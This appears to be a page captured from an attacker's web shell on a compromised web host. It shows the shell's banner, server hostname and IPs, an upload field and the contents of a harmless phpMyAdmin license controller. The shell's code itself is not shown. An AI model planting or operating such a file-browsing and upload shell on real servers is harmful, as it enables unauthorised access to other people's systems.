~ K    A     L    I ~
UNAME : Linux web65.extendcp.co.uk 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
SERVER IP : 10.0.187.65 -________- CLIENT IP : 216.73.216.230
PATH :/home/phpmyadmin-www/libraries/classes/Controllers/
UP FILE :
MINI SHELL D ZAB '
Current File : /home/phpmyadmin-www/libraries/classes/Controllers/LicenseController.php
<?php
/**
 * Simple script to set correct charset for the license
 */

declare(strict_types=1);

namespace PhpMyAdmin\Controllers;

use function __;
use function is_readable;
use function printf;
use function readfile;

/**
 * Simple script to set correct charset for the license
 */
class LicenseController extends AbstractController
{
    public function __invoke(): void
    {
        $this->response->disable();
        $this->response->header('Content-type: text/plain; charset=utf-8');

        $filename = LICENSE_FILE;

        // Check if the file is available, some distributions remove these.
        if (@is_readable($filename)) {
            readfile($filename);

            return;
        }

        printf(
            __(
                'The %s file is not available on this system, please visit %s for more information.'
            ),
            $filename,
            'https://www.phpmyadmin.net/'
        );
    }
}
Coded by KALI :v Greetz to DR HARD ../ kali.zbi@hotmail.com